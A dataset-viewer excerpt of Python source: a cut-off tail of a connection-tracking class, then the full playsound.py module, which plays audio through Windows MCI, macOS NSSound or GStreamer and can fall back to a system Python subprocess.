def _is_done(self):
return self._done
def _handle(self):
try:
self._conntracker.handle(
self._args['events'], is_done=self._is_done)
except Exception:
self._logger.exception('breaking out of handle wrap')
finally:
self._done = True
def _sub(self):
try:
self._syncer.sub(is_done=self._is_done)
except Exception:
self._logger.exception('breaking out of sub wrap')
self._done = True
|
playsound.py | import logging
logger = logging.getLogger(__name__)
class PlaysoundException(Exception):
    """Raised when a sound file cannot be located, loaded, or played."""
    pass
def _canonicalizePath(path):
"""
Support passing in a pathlib.Path-like object by converting to str.
"""
import sys
if sys.version_info[0] >= 3:
return str(path)
else:
# On earlier Python versions, str is a byte string, so attempting to
# convert a unicode string to str will fail. Leave it alone in this case.
return path
def _playsoundWin(sound, block = True):
    '''
    Utilizes windll.winmm. Tested and known to work with MP3 and WAVE on
    Windows 7 with Python 2.7. Probably works with more file formats.
    Probably works on Windows XP thru Windows 10. Probably works with all
    versions of Python.
    Inspired by (but not copied from) Michael Gundlach <gundlach@gmail.com>'s mp3play:
    https://github.com/michaelgundlach/mp3play
    I never would have tried using windll.winmm without seeing his code.
    '''
    # Quote the path so MCI handles filenames containing spaces.
    sound = '"' + _canonicalizePath(sound) + '"'
    from ctypes import create_unicode_buffer, windll, wintypes
    from time import sleep
    # Declare argument types so ctypes marshals the wide-string MCI calls
    # correctly on 64-bit Python.
    windll.winmm.mciSendStringW.argtypes = [wintypes.LPCWSTR, wintypes.LPWSTR, wintypes.UINT, wintypes.HANDLE]
    windll.winmm.mciGetErrorStringW.argtypes = [wintypes.DWORD, wintypes.LPWSTR, wintypes.UINT]

    def winCommand(*command):
        # Send one MCI command string; raise PlaysoundException with the
        # decoded MCI error message on failure.
        bufLen = 600
        buf = create_unicode_buffer(bufLen)
        command = ' '.join(command)
        errorCode = int(windll.winmm.mciSendStringW(command, buf, bufLen - 1, 0))  # use widestring version of the function
        if errorCode:
            errorBuffer = create_unicode_buffer(bufLen)
            windll.winmm.mciGetErrorStringW(errorCode, errorBuffer, bufLen - 1)  # use widestring version of the function
            exceptionMessage = ('\n Error ' + str(errorCode) + ' for command:'
                                '\n ' + command +
                                '\n ' + errorBuffer.value)
            logger.error(exceptionMessage)
            raise PlaysoundException(exceptionMessage)
        return buf.value

    try:
        logger.debug('Starting')
        winCommand(u'open {}'.format(sound))
        # ' wait' makes MCI block until playback finishes.
        winCommand(u'play {}{}'.format(sound, ' wait' if block else ''))
        logger.debug('Returning')
    finally:
        try:
            winCommand(u'close {}'.format(sound))
        except PlaysoundException:
            logger.warning(u'Failed to close the file: {}'.format(sound))
            # If it fails, there's nothing more that can be done...
            pass
def _handlePathOSX(sound):
    """Normalize *sound* into a URL string that NSSound can open.

    Bare filesystem paths are made absolute and given a ``file://`` scheme;
    non-ASCII URLs get their path component percent-encoded; spaces are
    always encoded as ``%20``.
    """
    sound = _canonicalizePath(sound)
    if '://' not in sound:
        # Bare filesystem path: make it absolute, then turn it into a URL.
        if not sound.startswith('/'):
            from os import getcwd
            sound = getcwd() + '/' + sound
        sound = 'file://' + sound
    try:
        # Already plain ASCII — don't double-encode it.
        sound.encode('ascii')
    except UnicodeEncodeError:
        try:
            from urllib.parse import quote  # Python 3
        except ImportError:
            from urllib import quote  # Python 2 fallback
        scheme, rest = sound.split('://', 1)
        return scheme + '://' + quote(rest.encode('utf-8')).replace(' ', '%20')
    return sound.replace(' ', '%20')
def _playsoundOSX(sound, block = True):
    '''
    Utilizes AppKit.NSSound. Tested and known to work with MP3 and WAVE on
    OS X 10.11 with Python 2.7. Probably works with anything QuickTime supports.
    Probably works on OS X 10.5 and newer. Probably works with all versions of
    Python.
    Inspired by (but not copied from) Aaron's Stack Overflow answer here:
    http://stackoverflow.com/a/34568298/901641
    I never would have tried using AppKit.NSSound without seeing his code.
    '''
    try:
        from AppKit import NSSound
    except ImportError:
        logger.warning("playsound could not find a copy of AppKit - falling back to using macOS's system copy.")
        # NOTE(review): relies on the module-level `import sys` executed in
        # the Darwin branch of the platform dispatch below — confirm this
        # function is never reached on other platforms.
        sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
        from AppKit import NSSound
    from Foundation import NSURL
    from time import sleep
    sound = _handlePathOSX(sound)
    url = NSURL.URLWithString_(sound)
    if not url:
        raise PlaysoundException('Cannot find a sound with filename: ' + sound)
    # Loading occasionally fails transiently; retry up to 5 times.
    for i in range(5):
        nssound = NSSound.alloc().initWithContentsOfURL_byReference_(url, True)
        if nssound:
            break
        else:
            logger.debug('Failed to load sound, although url was good... ' + sound)
    else:
        # for/else: all 5 attempts failed.
        raise PlaysoundException('Could not load sound with filename, although URL was good... ' + sound)
    nssound.play()
    if block:
        # NSSound.play() is asynchronous; sleep for the clip's duration.
        sleep(nssound.duration())
def _playsoundNix(sound, block = True):
    """Play a sound using GStreamer.
    Inspired by this:
    https://gstreamer.freedesktop.org/documentation/tutorials/playback/playbin-usage.html
    """
    sound = _canonicalizePath(sound)
    # pathname2url escapes non-URL-safe characters
    from os.path import abspath, exists
    try:
        from urllib.request import pathname2url
    except ImportError:
        # python 2
        from urllib import pathname2url
    import gi
    gi.require_version('Gst', '1.0')
    from gi.repository import Gst
    Gst.init(None)
    playbin = Gst.ElementFactory.make('playbin', 'playbin')
    if sound.startswith(('http://', 'https://')):
        # Remote URL: hand it to playbin directly.
        playbin.props.uri = sound
    else:
        # Local file: verify it exists, then build a file:// URI.
        path = abspath(sound)
        if not exists(path):
            raise PlaysoundException(u'File not found: {}'.format(path))
        playbin.props.uri = 'file://' + pathname2url(path)
    set_result = playbin.set_state(Gst.State.PLAYING)
    if set_result != Gst.StateChangeReturn.ASYNC:
        raise PlaysoundException(
            "playbin.set_state returned " + repr(set_result))
    # FIXME: use some other bus method than poll() with block=False
    # https://lazka.github.io/pgi-docs/#Gst-1.0/classes/Bus.html
    logger.debug('Starting play')
    if block:
        # Wait for end-of-stream, then always reset the pipeline.
        bus = playbin.get_bus()
        try:
            bus.poll(Gst.MessageType.EOS, Gst.CLOCK_TIME_NONE)
        finally:
            playbin.set_state(Gst.State.NULL)
    logger.debug('Finishing play')
def _playsoundAnotherPython(otherPython, sound, block = True, macOS = False):
    '''
    Mostly written so that when this is run on python3 on macOS, it can invoke
    python2 on macOS... but maybe this idea could be useful on linux, too.
    Re-runs this very module as a script under *otherPython* so the
    subprocess does the actual playback.
    '''
    from inspect import getsourcefile
    from os.path import abspath, exists
    from subprocess import check_call
    from threading import Thread
    sound = _canonicalizePath(sound)

    class PropogatingThread(Thread):
        # Thread subclass that captures any exception from the target and
        # re-raises it in the joining thread.
        def run(self):
            self.exc = None
            try:
                self.ret = self._target(*self._args, **self._kwargs)
            except BaseException as e:
                self.exc = e
        def join(self, timeout = None):
            super().join(timeout)
            if self.exc:
                raise self.exc
            return self.ret

    # Check if the file exists...
    if not exists(abspath(sound)):
        raise PlaysoundException('Cannot find a sound with filename: ' + sound)
    # Path of THIS module, to be executed as a script by the other Python.
    playsoundPath = abspath(getsourcefile(lambda: 0))
    t = PropogatingThread(target = lambda: check_call([otherPython, playsoundPath, _handlePathOSX(sound) if macOS else sound]))
    t.start()
    if block:
        t.join()
# Pick the platform-appropriate backend and publish it as `playsound`.
from platform import system
system = system()
if system == 'Windows':
    playsound = _playsoundWin
elif system == 'Darwin':
    playsound = _playsoundOSX
    import sys
    if sys.version_info[0] > 2:
        try:
            from AppKit import NSSound
        except ImportError:
            # No PyObjC for this Python 3: delegate playback to the system
            # Python 2, which ships with PyObjC.
            logger.warning("playsound is relying on a python 2 subprocess. Please use `pip3 install PyObjC` if you want playsound to run more efficiently.")
            playsound = lambda sound, block = True: _playsoundAnotherPython('/System/Library/Frameworks/Python.framework/Versions/2.7/bin/python', sound, block, macOS = True)
else:
    playsound = _playsoundNix
    if __name__ != '__main__':  # Ensure we don't infinitely recurse trying to get another python instance.
        try:
            import gi
            gi.require_version('Gst', '1.0')
            from gi.repository import Gst
        except:
            # GStreamer bindings missing: delegate playback to a subprocess
            # running the system python3 (which may have them).
            logger.warning("playsound is relying on another python subprocess. Please use `pip install pygobject` if you want playsound to run more efficiently.")
            playsound = lambda sound, block = True: _playsoundAnotherPython('/usr/bin/python3', sound, block, macOS = False)
# Avoid leaving the shadowed `system` name in the module namespace.
del system
if __name__ == '__main__':
    # block is always True if you choose to run this from the command line.
    # (This entry point is also what _playsoundAnotherPython re-invokes.)
    from sys import argv
    playsound(argv[1])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.